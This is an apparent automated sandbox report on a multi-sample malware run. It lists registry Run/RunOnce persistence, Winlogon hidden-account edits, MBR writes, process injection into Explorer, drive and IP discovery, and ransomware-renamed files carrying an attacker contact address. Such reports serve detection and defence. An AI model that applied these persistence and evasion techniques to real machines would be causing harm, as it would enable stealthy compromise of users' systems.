Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	13.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Dokumen4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Dibromob\\PRECONCE.vbs"	3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe"	juppp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\5JZXTPFPDZ = "C:\\Program Files (x86)\\Zfx4lo\\helpqrqlwhj.exe"	mstsc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""	16.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\feeed = "C:\\Windows\\system32\\pcalua.exe -a C:\\Users\\Admin\\AppData\\Roaming\\feeed.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\ltjqiq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Iarxckfisb\\hmwmcj.exe\""	hmwmcj.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ulvetim = "C:\\Users\\Admin\\Singul\\Hyperir.exe"	RegAsm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\16.exe = "C:\\Windows\\System32\\16.exe"	16.exe
Key created	\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	cmmon32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\CpSnJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CpSnJ\\CpSnJ.exe"	MSBuild.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

wyfdggaa.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wyfdggaa.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wyfdggaa.exe

Drops desktop.ini file(s) 64 IoCs

Processes:

16.exeIEXPLORE.EXE

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	16.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	16.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	16.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	16.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\8DDKLDOL\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RKGIF8TT\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	16.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	16.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F6QQJELO\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D08RECS3\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M1AZJ0WQ\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	16.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	16.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	IEXPLORE.EXE
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	16.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	16.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AT22T7OH\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\F6O5NPVK\desktop.ini	16.exe
File opened for modification	C:\Users\Public\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NXBH52U7\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	16.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	16.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	16.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	16.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	16.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	16.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exeapi.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\A:	api.exe
File opened (read-only)	\??\R:	api.exe
File opened (read-only)	\??\U:	api.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	api.exe
File opened (read-only)	\??\N:	api.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	api.exe
File opened (read-only)	\??\T:	api.exe
File opened (read-only)	\??\Z:	api.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	api.exe
File opened (read-only)	\??\M:	api.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	api.exe
File opened (read-only)	\??\X:	api.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	api.exe
File opened (read-only)	\??\O:	api.exe
File opened (read-only)	\??\S:	api.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\L:	api.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

27 ip-api.com
97 ip-api.com
115 ip-api.com
205 checkip.amazonaws.com

flow	ioc
27	ip-api.com
97	ip-api.com
115	ip-api.com
205	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 8 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

11.exehelpqrqlwhj.exeregsvcojoduf-.exe18.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	helpqrqlwhj.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	helpqrqlwhj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvcojoduf-.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvcojoduf-.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	18.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	11.exe

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

update.exeRDPWinst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

Writes to the Master Boot Record (MBR) 1 TTPs 8 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exerundll32.exealiens.exe0B44010BDDEFEFD3.exe0B44010BDDEFEFD3.exealiens.exeMiniThunderPlatform.exeapi.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	rundll32.exe
File opened for modification	\??\PhysicalDrive0	aliens.exe
File opened for modification	\??\PhysicalDrive0	0B44010BDDEFEFD3.exe
File opened for modification	\??\PhysicalDrive0	0B44010BDDEFEFD3.exe
File opened for modification	\??\PhysicalDrive0	aliens.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe
File opened for modification	\??\PhysicalDrive0	api.exe

Drops file in System32 directory 10 IoCs

Processes:

16.exesvchost.exetaskhost.exe

description	ioc	process
File created	C:\Windows\System32\16.exe	16.exe
File opened for modification	C:\Windows\System32\asyncreg.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb	svchost.exe
File created	C:\Windows\System32\Info.hta	16.exe
File opened for modification	C:\Windows\System32\dnsrsvlr.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.chk	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.log	svchost.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	svchost.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs

Processes:

Setup.exealiens.exe19.exe3.exe13.exe20.exe25.exe15.exe23.exe28.exe7.exe3.exe31.exe13.exeStyltendeschris.exeStyltendeschris.exe19.exealiens.exeRegAsm.exe

pid	process
1288	Setup.exe
2952	aliens.exe
3008	19.exe
2632	3.exe
1604	13.exe
3136	20.exe
3868	25.exe
1944	15.exe
3744	23.exe
4084	28.exe
1900	7.exe
4288	3.exe
3324	31.exe
4312	13.exe
1908	Styltendeschris.exe
3760	Styltendeschris.exe
4936	19.exe
3760	Styltendeschris.exe
3752	aliens.exe
3808	RegAsm.exe

Suspicious use of SetThreadContext 50 IoCs

Processes:

key.exekey.exe2.exe2.exekey.execmmon32.exe18.exeSetup.exerundll32.exemstsc.exe24.exeBTRSetp.exe3.exe13.exe9.exeIconCachenb6h.exeIconCachenb6h.exe30.exeStyltendeschris.exefeeed.exe26.exe11.exe19.exe11.exeIconCachenb6h.exeIconCachenb6h.execmmon32.exehelpqrqlwhj.exe22.exeIconCachenb6h.exeIconCachenb6h.exe23.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeregsvcojoduf-.exeregsvcojoduf-.exe

description	pid	process	target process
PID 1236 set thread context of 620	1236	key.exe	key.exe
PID 1416 set thread context of 2624	1416	key.exe	key.exe
PID 1076 set thread context of 2148	1076	2.exe	2.exe
PID 2148 set thread context of 1268	2148	2.exe	Explorer.EXE
PID 2652 set thread context of 3024	2652	key.exe	key.exe
PID 2428 set thread context of 1268	2428	cmmon32.exe	Explorer.EXE
PID 3068 set thread context of 1268	3068	18.exe	Explorer.EXE
PID 1288 set thread context of 3284	1288	Setup.exe	rundll32.exe
PID 1288 set thread context of 3948	1288	Setup.exe	rundll32.exe
PID 1288 set thread context of 4012	1288	Setup.exe	rundll32.exe
PID 4012 set thread context of 3132	4012	rundll32.exe	rundll32.exe
PID 3636 set thread context of 1268	3636	mstsc.exe	Explorer.EXE
PID 3832 set thread context of 1552	3832	24.exe	24.exe
PID 3396 set thread context of 3968	3396	BTRSetp.exe	BTRSetp.exe
PID 2632 set thread context of 4288	2632	3.exe	3.exe
PID 1604 set thread context of 4312	1604	13.exe	13.exe
PID 2180 set thread context of 4700	2180	9.exe	9.exe
PID 3844 set thread context of 1548	3844	IconCachenb6h.exe	IconCachenb6h.exe
PID 1548 set thread context of 1268	1548	IconCachenb6h.exe	Explorer.EXE
PID 948 set thread context of 4948	948	30.exe	MSBuild.exe
PID 1908 set thread context of 3760	1908	Styltendeschris.exe	Styltendeschris.exe
PID 5016 set thread context of 3704	5016	feeed.exe	InstallUtil.exe
PID 3956 set thread context of 4580	3956	26.exe	26.exe
PID 1844 set thread context of 2828	1844	11.exe	11.exe
PID 3008 set thread context of 4936	3008	19.exe	19.exe
PID 2828 set thread context of 1268	2828	11.exe	Explorer.EXE
PID 2828 set thread context of 1268	2828	11.exe	Explorer.EXE
PID 2416 set thread context of 1568	2416	IconCachenb6h.exe	IconCachenb6h.exe
PID 1568 set thread context of 1268	1568	IconCachenb6h.exe	Explorer.EXE
PID 4560 set thread context of 1268	4560	cmmon32.exe	Explorer.EXE
PID 3432 set thread context of 1268	3432	helpqrqlwhj.exe	Explorer.EXE
PID 3552 set thread context of 4800	3552	22.exe	vbc.exe
PID 5052 set thread context of 4032	5052	IconCachenb6h.exe	IconCachenb6h.exe
PID 4032 set thread context of 1268	4032	IconCachenb6h.exe	Explorer.EXE
PID 4032 set thread context of 1268	4032	IconCachenb6h.exe	Explorer.EXE
PID 3744 set thread context of 3808	3744	23.exe	RegAsm.exe
PID 4680 set thread context of 2412	4680	IconCachenb6h.exe	IconCachenb6h.exe
PID 2412 set thread context of 1268	2412	IconCachenb6h.exe	Explorer.EXE
PID 2412 set thread context of 1268	2412	IconCachenb6h.exe	Explorer.EXE
PID 5020 set thread context of 3580	5020	IconCachenb6h.exe	IconCachenb6h.exe
PID 3580 set thread context of 1268	3580	IconCachenb6h.exe	Explorer.EXE
PID 3580 set thread context of 1268	3580	IconCachenb6h.exe	Explorer.EXE
PID 3256 set thread context of 4424	3256	IconCachenb6h.exe	IconCachenb6h.exe
PID 4424 set thread context of 1268	4424	IconCachenb6h.exe	Explorer.EXE
PID 2428 set thread context of 1208	2428	cmmon32.exe	iexplore.exe
PID 2428 set thread context of 4436	2428	cmmon32.exe	IEXPLORE.EXE
PID 2428 set thread context of 4716	2428	cmmon32.exe	iexplore.exe
PID 5768 set thread context of 4616	5768	regsvcojoduf-.exe	regsvcojoduf-.exe
PID 4616 set thread context of 1268	4616	regsvcojoduf-.exe	Explorer.EXE
PID 2428 set thread context of 2568	2428	cmmon32.exe	IEXPLORE.EXE

Drops file in Program Files directory 64 IoCs

Processes:

16.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00486_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00390_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api	16.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar	16.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js	16.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15135_.GIF	16.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png	16.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\THMBNAIL.PNG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files\Java\jre7\bin\jfxmedia.dll.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\NAME.DLL.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OMSMAIN.DLL	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF	16.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PAPYRUS\PAPYRUS.INF	16.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png	16.exe
File opened for modification	C:\Program Files\Java\jre7\bin\keytool.exe	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll	16.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl.css	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg	16.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00308_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files\Mozilla Firefox\maintenanceservice.exe.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\MCPS.DLL.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\XOCR3.PSP.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn	16.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.ELM.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\en-US\msdaremr.dll.mui	16.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml	16.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\PublicFunctions.js	16.exe
File created	C:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\en-US.pak.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\DATES.XML.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
